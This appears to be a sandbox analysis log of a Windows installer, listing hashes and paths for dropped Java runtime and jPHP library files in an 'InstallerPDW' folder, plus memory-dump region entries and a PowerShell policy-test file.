SHA512 25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\client\jvm.dll

MD5 39c302fe0781e5af6d007e55f509606a
SHA1 23690a52e8c6578de6a7980bb78aae69d0f31780
SHA256 b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc
SHA512 67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\i386\jvm.cfg

MD5 9fd47c1a487b79a12e90e7506469477b
SHA1 7814df0ff2ea1827c75dcd73844ca7f025998cc6
SHA256 a73aea3074360cf62adedc0c82bc9c0c36c6a777c70da6c544d0fba7b2d8529e
SHA512 97b9d4c68ac4b534f86efa9af947763ee61aee6086581d96cbf7b3dbd6fd5d9db4b4d16772dce6f347b44085cef8a6ea3bfd3b84fbd9d4ef763cef39255fbce3

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\verify.dll

MD5 de2167a880207bbf7464bcd1f8bc8657
SHA1 0ff7a5ea29c0364a1162a090dffc13d29bc3d3c7
SHA256 fd856ea783ad60215ce2f920fcb6bb4e416562d3c037c06d047f1ec103cd10b3
SHA512 bb83377c5cff6117cec6fbadf6d40989ce1ee3f37e4ceba17562a59ea903d8962091146e2aa5cc44cfdddf280da7928001eea98abf0c0942d69819b2433f1322

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\java.dll

MD5 73bd0b62b158c5a8d0ce92064600620d
SHA1 63c74250c17f75fe6356b649c484ad5936c3e871
SHA256 e7b870deb08bc864fa7fd4dec67cef15896fe802fafb3009e1b7724625d7da30
SHA512 eba1cf977365446b35740471882c5209773a313de653404a8d603245417d32a4e9f23e3b6cd85721143d2f9a0e46ed330c3d8ba8c24aee390d137f9b5cd68d8f

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\meta-index

MD5 91aa6ea7320140f30379f758d626e59d
SHA1 3be2febe28723b1033ccdaa110eaf59bbd6d1f96
SHA256 4af21954cdf398d1eae795b6886ca2581dac9f2f1d41c98c6ed9b5dbc3e3c1d4
SHA512 03428803f1d644d89eb4c0dcbdea93acaac366d35fc1356ccabf83473f4fef7924edb771e44c721103cec22d94a179f092d1bfd1c0a62130f076eb82a826d7cb

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\zip.dll

MD5 cb99b83bbc19cd0e1c2ec6031d0a80bc
SHA1 927e1e24fd19f9ca8b5191ef3cc746b74ab68bcd
SHA256 68148243e3a03a3a1aaf4637f054993cb174c04f6bd77894fe84d74af5833bec
SHA512 29c4978fa56f15025355ce26a52bdf8197b8d8073a441425df3dfc93c7d80d36755cc05b6485dd2e1f168df2941315f883960b81368e742c4ea8e69dd82fa2ba

memory/3616-239-0x0000000002260000-0x0000000002288000-memory.dmp

memory/3616-245-0x00000000022A8000-0x00000000022B0000-memory.dmp

memory/3616-247-0x00000000022B0000-0x00000000022B8000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\ext\meta-index

MD5 77abe2551c7a5931b70f78962ac5a3c7
SHA1 a8bb53a505d7002def70c7a8788b9a2ea8a1d7bc
SHA256 c557f0c9053301703798e01dc0f65e290b0ae69075fb49fcc0e68c14b21d87f4
SHA512 9fe671380335804d4416e26c1e00cded200687db484f770ebbdb8631a9c769f0a449c661cb38f49c41463e822beb5248e69fd63562c3d8c508154c5d64421935

memory/3616-265-0x0000000002298000-0x00000000022A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\asm-all.jar

MD5 f5ad16c7f0338b541978b0430d51dc83
SHA1 2ea49e08b876bbd33e0a7ce75c8f371d29e1f10a
SHA256 7fbffbc1db3422e2101689fd88df8384b15817b52b9b2b267b9f6d2511dc198d
SHA512 82e6749f4a6956f5b8dd5a5596ca170a1b7ff4e551714b56a293e6b8c7b092cbec2bec9dc0d9503404deb8f175cbb1ded2e856c6bc829411c8ed311c1861336a

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-gui-ext.jar

MD5 6696368a09c7f8fed4ea92c4e5238cee
SHA1 f89c282e557d1207afd7158b82721c3d425736a7
SHA256 c25d7a7b8f0715729bccb817e345f0fdd668dd4799c8dab1a4db3d6a37e7e3e4
SHA512 0ab24f07f956e3cdcd9d09c3aa4677ff60b70d7a48e7179a02e4ff9c0d2c7a1fc51624c3c8a5d892644e9f36f84f7aaf4aa6d2c9e1c291c88b3cff7568d54f76

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-desktop-ext.jar

MD5 b50e2c75f5f0e1094e997de8a2a2d0ca
SHA1 d789eb689c091536ea6a01764bada387841264cb
SHA256 cf4068ebb5ecd47adec92afba943aea4eb2fee40871330d064b69770cccb9e23
SHA512 57d8ac613805edada6aeba7b55417fd7d41c93913c56c4c2c1a8e8a28bbb7a05aade6e02b70a798a078dc3c747967da242c6922b342209874f3caf7312670cb0

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-core.jar

MD5 7e5e3d6d352025bd7f093c2d7f9b21ab
SHA1 ad9bfc2c3d70c574d34a752c5d0ebcc43a046c57
SHA256 5b37e8ff2850a4cbb02f9f02391e9f07285b4e0667f7e4b2d4515b78e699735a
SHA512 c19c29f8ad8b6beb3eed40ab7dc343468a4ca75d49f1d0d4ea0b4a5cee33f745893fba764d35c8bd157f7842268e0716b1eb4b8b26dcf888fb3b3f4314844aad

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-app-framework.jar

MD5 0c8768cdeb3e894798f80465e0219c05
SHA1 c4da07ac93e4e547748ecc26b633d3db5b81ce47
SHA256 15f36830124fc7389e312cf228b952024a8ce8601bf5c4df806bc395d47db669
SHA512 35db507a3918093b529547e991ab6c1643a96258fc95ba1ea7665ff762b0b8abb1ef732b3854663a947effe505be667bd2609ffcccb6409a66df605f971da106

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\gson.jar

MD5 5134a2350f58890ffb9db0b40047195d
SHA1 751f548c85fa49f330cecbb1875893f971b33c4e
SHA256 2d43eb5ea9e133d2ee2405cc14f5ee08951b8361302fdd93494a3a997b508d32
SHA512 c3cdaf66a99e6336abc80ff23374f6b62ac95ab2ae874c9075805e91d849b18e3f620cc202b4978fc92b73d98de96089c8714b1dd096b2ae1958cfa085715f7a

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\dn-php-sdk.jar

MD5 3e5e8cccff7ff343cbfe22588e569256
SHA1 66756daa182672bff27e453eed585325d8cc2a7a
SHA256 0f26584763ef1c5ec07d1f310f0b6504bc17732f04e37f4eb101338803be0dc4
SHA512 8ea5f31e25c3c48ee21c51abe9146ee2a270d603788ec47176c16acac15dad608eef4fa8ca0f34a1bbc6475c29e348bd62b0328e73d2e1071aaa745818867522

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\dn-compiled-module.jar

MD5 c7f4b29600c2353f7599dd4da851dae4
SHA1 cfd3a61067e1982a56e1c5c77e53bbd523ad1dcc
SHA256 95371359a009dd7102e05aa36bc395c391772fc6066e95b46cbceadff1b6a58d
SHA512 e51bd0c5ffd5db1746b2d928f4610b7bd186a392652b5cac06200c226c69516933491e8dcb171e27be53fb9b7c5a28b8cd8f0c7bd6d1aaac3211bd5ba2fdaf06

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\COPYRIGHT

MD5 fc605d978e7825595d752df2ef03f8af
SHA1 c493c9541caaee4bfe3b3e48913fd9df7809299f
SHA256 7d697eaa9acf50fe0b57639b3c62ff02916da184f191944f49eca93d0bb3374f
SHA512 fb811de6a2b36b28ca904224ea3525124bd4628ca9618c70eb9234ab231a09c1b1f28d9b6301581a4fa2e20f1036d5e1c3d6f1bf316c7fe78ef6edeae50ea40e

memory/3616-266-0x00000000022F8000-0x0000000002300000-memory.dmp

memory/3616-263-0x00000000022A0000-0x00000000022A8000-memory.dmp

memory/3616-262-0x0000000002300000-0x0000000002308000-memory.dmp

memory/3616-277-0x0000000002308000-0x0000000002310000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-json-ext.jar

MD5 fde38932b12fc063451af6613d4470cc
SHA1 bc08c114681a3afc05fb8c0470776c3eae2eefeb
SHA256 9967ea3c3d1aee8db5a723f714fba38d2fc26d8553435ab0e1d4e123cd211830
SHA512 0f211f81101ced5fff466f2aab0e6c807bb18b23bc4928fe664c60653c99fa81b34edf5835fcc3affb34b0df1fa61c73a621df41355e4d82131f94fcc0b0e839

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-runtime.jar

MD5 d5ef47c915bef65a63d364f5cf7cd467
SHA1 f711f3846e144dddbfb31597c0c165ba8adf8d6b
SHA256 9c287472408857301594f8f7bda108457f6fdae6e25c87ec88dbf3012e5a98b6
SHA512 04aeb956bfcd3bd23b540f9ad2d4110bb2ffd25fe899152c4b2e782daa23a676df9507078ecf1bfc409ddfbe2858ab4c4c324f431e45d8234e13905eb192bae8

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\ext\jfxrt.jar

MD5 042b3675517d6a637b95014523b1fd7d
SHA1 82161caf5f0a4112686e4889a9e207c7ba62a880
SHA256 a570f20f8410f9b1b7e093957bf0ae53cae4731afaea624339aa2a897a635f22
SHA512 7672d0b50a92e854d3bd3724d01084cc10a90678b768e9a627baf761993e56a0c6c62c19155649fe9a8ceeabf845d86cbbb606554872ae789018a8b66e5a2b35

memory/3616-282-0x0000000002310000-0x0000000002318000-memory.dmp

memory/3616-284-0x0000000002318000-0x0000000002320000-memory.dmp

memory/3616-286-0x0000000002320000-0x0000000002328000-memory.dmp

memory/3616-288-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-290-0x0000000002328000-0x0000000002330000-memory.dmp

memory/3616-289-0x0000000002260000-0x0000000002288000-memory.dmp

memory/3616-291-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-294-0x0000000002330000-0x0000000002338000-memory.dmp

memory/3616-293-0x00000000022A8000-0x00000000022B0000-memory.dmp

memory/3616-298-0x0000000002338000-0x0000000002340000-memory.dmp

memory/3616-297-0x00000000022B0000-0x00000000022B8000-memory.dmp

memory/3616-303-0x0000000002340000-0x0000000002348000-memory.dmp

memory/3616-302-0x0000000002298000-0x00000000022A0000-memory.dmp

memory/3616-301-0x0000000002300000-0x0000000002308000-memory.dmp

memory/3616-307-0x0000000002348000-0x0000000002350000-memory.dmp

memory/3616-310-0x0000000002350000-0x0000000002358000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-zend-ext.jar

MD5 4bc2aea7281e27bc91566377d0ed1897
SHA1 d02d897e8a8aca58e3635c009a16d595a5649d44
SHA256 4aef566bbf3f0b56769a0c45275ebbf7894e9ddb54430c9db2874124b7cea288
SHA512 da35bb2f67bca7527dc94e5a99a162180b2701ddca2c688d9e0be69876aca7c48f192d0f03d431ccd2d8eec55e0e681322b4f15eba4db29ef5557316e8e51e10

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-xml-ext.jar

MD5 0a79304556a1289aa9e6213f574f3b08
SHA1 7ee3bde3b1777bf65d4f62ce33295556223a26cd
SHA256 434e57fffc7df0b725c1d95cabafdcdb83858ccb3e5e728a74d3cf33a0ca9c79
SHA512 1560703d0c162d73c99cef9e8ddc050362e45209cc8dea6a34a49e2b6f99aae462eae27ba026bdb29433952b6696896bb96998a0f6ac0a3c1dbbb2f6ebc26a7e

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\currency.data

MD5 f6258230b51220609a60aa6ba70d68f3
SHA1 b5b95dd1ddcd3a433db14976e3b7f92664043536
SHA256 22458853da2415f7775652a7f57bb6665f83a9ae9fb8bd3cf05e29aac24c8441
SHA512 b2dfcfdebf9596f2bb05f021a24335f1eb2a094dca02b2d7dd1b7c871d5eecda7d50da7943b9f85edb5e92d9be6b6adfd24673ce816df3960e4d68c7f894563f

memory/3616-316-0x0000000002358000-0x0000000002360000-memory.dmp

memory/3616-315-0x0000000002308000-0x0000000002310000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-zip-ext.jar

MD5 20f6f88989e806d23c29686b090f6190
SHA1 1fdb9a66bb5ca587c05d3159829a8780bb66c87d
SHA256 9d5f06d539b91e98fd277fc01fd2f9af6fea58654e3b91098503b235a83abb16
SHA512 2798bb1dd0aa121cd766bd5b47d256b1a528e9db83ed61311fa685f669b7f60898118ae8c69d2a30d746af362b810b133103cbe426e0293dd2111aca1b41ccea

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\LICENSE

MD5 67cb88f6234b6a1f2320a23b197fa3f6
SHA1 877aceba17b28cfff3f5df664e03b319f23767a1
SHA256 263e21f4b43c118a8b4c07f1a8acb11cafc232886834433e34187f5663242360
SHA512 4d43e5edecab92cebd853204c941327dccbfd071a71f066c12f7fb2f1b2def59c37a15ce05c4fe06ec2ea296b8630c4e938254a8a92e149e4a0a82c4307d648f

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\zt-zip.jar

MD5 0fd8bc4f0f2e37feb1efc474d037af55
SHA1 add8fface4c1936787eb4bffe4ea944a13467d53
SHA256 1e31ef3145d1e30b31107b7afc4a61011ebca99550dce65f945c2ea4ccac714b
SHA512 29de5832db5b43fdc99bb7ea32a7359441d6cf5c05561dd0a6960b33078471e4740ee08ffbd97a5ced4b7dd9cc98fad6add43edb4418bf719f90f83c58188149

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\Welcome.html

MD5 3cb773cb396842a7a43ad4868a23abe5
SHA1 ace737f039535c817d867281190ca12f8b4d4b75
SHA256 f450aee7e8fe14512d5a4b445aa5973e202f9ed1e122a8843e4dc2d4421015f0
SHA512 6058103b7446b61613071c639581f51718c12a9e7b6abd3cf3047a3093c2e54b2d9674faf9443570a3bb141f839e03067301ff35422eb9097bd08020e0dd08a4

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\THIRDPARTYLICENSEREADME.txt

MD5 0e87879f452892b85c81071a1ddd5a2a
SHA1 2cf97c1a84374a6fbbd5d97fe1b432fa799c3b19
SHA256 9c18836fd0b5e4b0c57cffdb74574fa5549085c3b327703dc8efe4208f4e3321
SHA512 10ba68ffd9deab10a0b200707c3af9e95e27aed004f66f049d41310cb041b7618ee017219c848912d5951599208d385bcb928dd33175652101c7e5bc2e3eba5b

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt

MD5 0e05bd8b9bfcf17f142445d1f8c6561c
SHA1 cf0a9f4040603008891aa0731abf89ce2403f2fb
SHA256 c3ea3996241b8e9ae7db3780e470174076fd2003d8aefaa77bf0bab5e04de050
SHA512 07c7865d31d22ba0c68e384afedc22261f7b3a82bebc9324145ff7f631623eca2dc31c71cdbbfc9febc1733451a095302de2a0877821a5b68038e350969bf460

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\slf4j-simple.jar

MD5 722bb90689aecc523e3fe317e1f0984b
SHA1 8dacf9514f0c707cbbcdd6fd699e8940d42fb54e
SHA256 0966e86fffa5be52d3d9e7b89dd674d98a03eed0a454fbaf7c1bd9493bd9d874
SHA512 d5effbfa105bcd615e56ef983075c9ef0f52bcfdbefa3ce8cea9550f25b859e48b32f2ec9aa7a305c6611a3be5e0cde0d269588d9c2897ca987359b77213331d

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\slf4j-api.jar

MD5 caafe376afb7086dcbee79f780394ca3
SHA1 da76ca59f6a57ee3102f8f9bd9cee742973efa8a
SHA256 18c4a0095d5c1da6b817592e767bb23d29dd2f560ad74df75ff3961dbde25b79
SHA512 5dd6271fd5b34579d8e66271bab75c89baca8b2ebeaa9966de391284bd08f2d720083c6e0e1edda106ecf8a04e9a32116de6873f0f88c19c049c0fe27e5d820b

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\release

MD5 a61b1e3fe507d37f0d2f3add5ac691e0
SHA1 8ae1050ff466b8f024eed5bc067b87784f19a848
SHA256 f9e84b54cf0d8cb0645e0d89bf47ed74c88af98ac5bf9ccf3accb1a824f7dc3a
SHA512 3e88a839e44241ae642d0f9b7000d80be7cf4bd003a9e2f9f04a4feb61ec4877b2b4e76151503184f4b9978894ba1d0de034dbc5f2e51c31b3abb24f0eacf0c7

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\README.txt

MD5 4bda1f1b04053dcfe66e87a77b307bb1
SHA1 b8b35584be24be3a8e1160f97b97b2226b38fa7d
SHA256 fd475b1619675b9fb3f5cd11d448b97eddee8d1f6ddcca13ded8bc6e0caa9cf3
SHA512 997cee676018076e9e4e94d61ec94d5b69b148b3152a0148e70d0be959533a13ad0bc1e8b43268f91db08b881bf5050a6d5c157d456597260a2b332a48068980

memory/3616-330-0x0000000002360000-0x0000000002368000-memory.dmp

memory/3616-329-0x0000000002310000-0x0000000002318000-memory.dmp

memory/3616-334-0x0000000002368000-0x0000000002370000-memory.dmp

memory/3616-333-0x0000000002318000-0x0000000002320000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\security\java.security

MD5 409c132fe4ea4abe9e5eb5a48a385b61
SHA1 446d68298be43eb657934552d656fa9ae240f2a2
SHA256 4d9e5a12b8cac8b36ecd88468b1c4018bc83c97eb467141901f90358d146a583
SHA512 7fed286ac9aed03e2dae24c3864edbbf812b65965c7173cc56ce622179eb5f872f77116275e96e1d52d1c58d3cdebe4e82b540b968e95d5da656aa74ad17400d

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\jsse.jar

MD5 fd1434c81219c385f30b07e33cef9f30
SHA1 0b5ee897864c8605ef69f66dfe1e15729cfcbc59
SHA256 bc3a736e08e68ace28c68b0621dccfb76c1063bd28d7bd8fce7b20e7b7526cc5
SHA512 9a778a3843744f1fabad960aa22880d37c30b1cab29e123170d853c9469dc54a81e81a9070e1de1bf63ba527c332bb2b1f1d872907f3bdce33a6898a02fef22d

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\net.dll

MD5 691b937a898271ee2cffab20518b310b
SHA1 abedfcd32c3022326bc593ab392dea433fcf667c
SHA256 2f5f1199d277850a009458edb5202688c26dd993f68fe86ca1b946dc74a36d61
SHA512 1c09f4e35a75b336170f64b5c7254a51461dc1997b5862b62208063c6cf84a7cb2d66a67e947cbbf27e1cf34ccd68ba4e91c71c236104070ef3beb85570213ec

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\nio.dll

MD5 95edb3cb2e2333c146a4dd489ce67cbd
SHA1 79013586a6e65e2e1f80e5caf9e2aa15b7363f9a
SHA256 96cf590bddfd90086476e012d9f48a9a696efc054852ef626b43d6d62e72af31
SHA512 ab671f1bce915d748ee49518cc2a666a2715b329cab4ab8f6b9a975c99c146bb095f7a4284cd2aaf4a5b4fcf4f939f54853af3b3acc4205f89ed2ba8a33bb553

memory/3616-347-0x0000000002370000-0x0000000002378000-memory.dmp

memory/3616-346-0x0000000002320000-0x0000000002328000-memory.dmp

memory/3616-351-0x0000000002378000-0x0000000002380000-memory.dmp

memory/3616-350-0x0000000002328000-0x0000000002330000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\tzdb.dat

MD5 5a7f416bd764e4a0c2deb976b1d04b7b
SHA1 e12754541a58d7687deda517cdda14b897ff4400
SHA256 a636afa5edba8aa0944836793537d9c5b5ca0091ccc3741fc0823edae8697c9d
SHA512 3ab2ad86832b98f8e5e1ce1c1b3ffefa3c3d00b592eb1858e4a10fff88d1a74da81ad24c7ec82615c398192f976a1c15358fce9451aa0af9e65fb566731d6d8f

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\tzmappings

MD5 b8dd8953b143685b5e91abeb13ff24f0
SHA1 b5ceb39061fce39bb9d7a0176049a6e2600c419c
SHA256 3d49b3f2761c70f15057da48abe35a59b43d91fa4922be137c0022851b1ca272
SHA512 c9cd0eb1ba203c170f8196cbab1aaa067bcc86f2e52d0baf979aad370edf9f773e19f430777a5a1c66efe1ec3046f9bc82165acce3e3d1b8ae5879bd92f09c90

memory/3616-357-0x0000000002380000-0x0000000002388000-memory.dmp

memory/3616-356-0x0000000002330000-0x0000000002338000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\resources.jar

MD5 9a084b91667e7437574236cd27b7c688
SHA1 d8926cc4aa12d6fe9abe64c8c3cb8bc0f594c5b1
SHA256 a1366a75454fc0f1ca5a14ea03b4927bb8584d6d5b402dfa453122ae16dbf22d
SHA512 d603aa29e1f6eefff4b15c7ebc8a0fa18e090d2e1147d56fd80581c7404ee1cb9d6972fcf2bd0cb24926b3af4dfc5be9bce1fe018681f22a38adaa278bf22d73

memory/3616-362-0x0000000002388000-0x0000000002390000-memory.dmp

memory/3616-361-0x0000000002338000-0x0000000002340000-memory.dmp

memory/3616-366-0x0000000002390000-0x0000000002398000-memory.dmp

memory/3616-365-0x0000000002340000-0x0000000002348000-memory.dmp

memory/3616-369-0x0000000002348000-0x0000000002350000-memory.dmp

memory/3616-370-0x0000000002398000-0x00000000023A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcr120.dll

MD5 034ccadc1c073e4216e9466b720f9849
SHA1 f19e9d8317161edc7d3e963cc0fc46bd5e4a55a1
SHA256 86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f
SHA512 5f11ef92d936669ee834a5cef5c7d0e7703bf05d03dc4f09b9dcfe048d7d5adfaab6a9c7f42e8080a5e9aad44a35f39f3940d5cca20623d9cafe373c635570f7

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcp120.dll

MD5 fd5cabbe52272bd76007b68186ebaf00
SHA1 efd1e306c1092c17f6944cc6bf9a1bfad4d14613
SHA256 87c42ca155473e4e71857d03497c8cbc28fa8ff7f2c8d72e8a1f39b71078f608
SHA512 1563c8257d85274267089cd4aeac0884a2a300ff17f84bdb64d567300543aa9cd57101d8408d0077b01a600ddf2e804f7890902c2590af103d2c53ff03d9e4a5

memory/3616-377-0x00000000023A0000-0x00000000023A8000-memory.dmp

memory/3616-376-0x0000000002350000-0x0000000002358000-memory.dmp

memory/3616-379-0x0000000002358000-0x0000000002360000-memory.dmp

memory/3616-380-0x00000000023A8000-0x00000000023B0000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\prism_d3d.dll

MD5 5aadadf700c7771f208dda7ce60de120
SHA1 e9cf7e7d1790dc63a58106c416944fd6717363a5
SHA256 89dac9792c884b70055566564aa12a8626c3aa127a89303730e66aba3c045f79
SHA512 624431a908c2a835f980391a869623ee1fa1f5a1a41f3ee08040e6395b8c11734f76fe401c4b9415f2055e46f60a7f9f2ac0a674604e5743ab8301dbadf279f2

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\glass.dll

MD5 434cbb561d7f326bbeffa2271ecc1446
SHA1 3d9639f6da2bc8ac5a536c150474b659d0177207
SHA256 1edd9022c10c27bbba2ad843310458edaead37a9767c6fc8fddaaf1adfcbc143
SHA512 9e37b985ecf0b2fef262f183c1cd26d437c8c7be97aa4ec4cd8c75c044336cc69a56a4614ea6d33dc252fe0da8e1bbadc193ff61b87be5dce6610525f321b6dc

memory/3616-390-0x0000000002360000-0x0000000002368000-memory.dmp

memory/3616-391-0x00000000023B0000-0x00000000023B8000-memory.dmp

memory/3616-392-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-398-0x00000000023B8000-0x00000000023C0000-memory.dmp

memory/3616-397-0x0000000002368000-0x0000000002370000-memory.dmp

memory/3616-399-0x0000000002370000-0x0000000002378000-memory.dmp

memory/3616-400-0x00000000023C0000-0x00000000023C8000-memory.dmp

memory/3616-404-0x00000000023C8000-0x00000000023D0000-memory.dmp

memory/3616-403-0x0000000002378000-0x0000000002380000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javafx_font.dll

MD5 aeada06201bb8f5416d5f934aaa29c87
SHA1 35bb59febe946fb869e5da6500ab3c32985d3930
SHA256 f8f0b1e283fd94bd87abca162e41afb36da219386b87b0f6a7e880e99073bda3
SHA512 89bad9d1115d030b98e49469275872fff52d8e394fe3f240282696cf31bccf0b87ff5a0e9a697a05befcfe9b24772d65ed73c5dbd168eed111700caad5808a78

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\awt.dll

MD5 159ccf1200c422ced5407fed35f7e37d
SHA1 177a216b71c9902e254c0a9908fcb46e8d5801a9
SHA256 30eb581c99c8bcbc54012aa5e6084b6ef4fcee5d9968e9cc51f5734449e1ff49
SHA512 ab3f4e3851313391b5b8055e4d526963c38c4403fa74fb70750cc6a2d5108e63a0e600978fa14a7201c48e1afd718a1c6823d091c90d77b17562b7a4c8c40365

memory/3616-412-0x00000000023D0000-0x00000000023D8000-memory.dmp

memory/3616-411-0x0000000002380000-0x0000000002388000-memory.dmp

memory/3616-416-0x00000000023D8000-0x00000000023E0000-memory.dmp

memory/3616-415-0x0000000002388000-0x0000000002390000-memory.dmp

memory/3616-418-0x00000000023E0000-0x00000000023E8000-memory.dmp

memory/3616-417-0x0000000002390000-0x0000000002398000-memory.dmp

memory/3616-419-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-423-0x00000000023E8000-0x00000000023F0000-memory.dmp

memory/3616-422-0x0000000002398000-0x00000000023A0000-memory.dmp

memory/3616-425-0x00000000023F0000-0x00000000023F8000-memory.dmp

memory/3616-424-0x00000000023A0000-0x00000000023A8000-memory.dmp

memory/3616-428-0x00000000023A8000-0x00000000023B0000-memory.dmp

memory/3616-429-0x00000000023F8000-0x0000000002400000-memory.dmp

memory/3616-432-0x0000000002400000-0x0000000002408000-memory.dmp

memory/3616-431-0x00000000023B0000-0x00000000023B8000-memory.dmp

memory/3616-434-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-436-0x0000000002408000-0x0000000002410000-memory.dmp

memory/3616-435-0x00000000023B8000-0x00000000023C0000-memory.dmp

memory/3616-439-0x0000000002410000-0x0000000002418000-memory.dmp

memory/3616-438-0x00000000023C0000-0x00000000023C8000-memory.dmp

memory/3616-440-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-444-0x0000000002418000-0x0000000002420000-memory.dmp

memory/3616-443-0x00000000023C8000-0x00000000023D0000-memory.dmp

memory/3616-449-0x0000000002420000-0x0000000002428000-memory.dmp

memory/3616-448-0x00000000023D0000-0x00000000023D8000-memory.dmp

memory/3616-454-0x0000000002428000-0x0000000002430000-memory.dmp

memory/3616-453-0x00000000023D8000-0x00000000023E0000-memory.dmp

memory/3616-457-0x0000000002430000-0x0000000002438000-memory.dmp

memory/3616-456-0x00000000023E0000-0x00000000023E8000-memory.dmp

memory/3616-460-0x0000000002438000-0x0000000002440000-memory.dmp

memory/3616-459-0x00000000023E8000-0x00000000023F0000-memory.dmp

memory/3616-463-0x0000000002440000-0x0000000002448000-memory.dmp

memory/3616-462-0x00000000023F0000-0x00000000023F8000-memory.dmp

memory/3616-467-0x0000000002448000-0x0000000002450000-memory.dmp

memory/3616-466-0x00000000023F8000-0x0000000002400000-memory.dmp

memory/3616-470-0x0000000002450000-0x0000000002458000-memory.dmp

memory/3616-469-0x0000000002400000-0x0000000002408000-memory.dmp

memory/3616-473-0x0000000002458000-0x0000000002460000-memory.dmp

memory/3616-472-0x0000000002408000-0x0000000002410000-memory.dmp

memory/3616-476-0x0000000002460000-0x0000000002468000-memory.dmp

memory/3616-475-0x0000000002410000-0x0000000002418000-memory.dmp

memory/3616-480-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-483-0x0000000002418000-0x0000000002420000-memory.dmp

memory/3616-484-0x0000000002420000-0x0000000002428000-memory.dmp

memory/3616-486-0x0000000002428000-0x0000000002430000-memory.dmp

memory/3616-487-0x0000000002430000-0x0000000002438000-memory.dmp

memory/3616-490-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-491-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-498-0x0000000002438000-0x0000000002440000-memory.dmp

memory/3616-500-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-501-0x0000000002440000-0x0000000002448000-memory.dmp

memory/3616-526-0x0000000000780000-0x0000000000781000-memory.dmp

memory/208-527-0x00007FFE4D410000-0x00007FFE4D582000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aozmvjqy.urj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/208-552-0x00007FFE4D590000-0x00007FFE4D845000-memory.dmp

memory/208-551-0x00007FFE581F0000-0x00007FFE58224000-memory.dmp

memory/208-550-0x00007FF7CB720000-0x00007FF7CB818000-memory.dmp

memory/3320-553-0x00007FFE4D6D0000-0x00007FFE4D842000-memory.dmp

memory/3616-556-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-557-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-560-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-561-0x0000000000780000-0x0000000000781000-memory.dmp

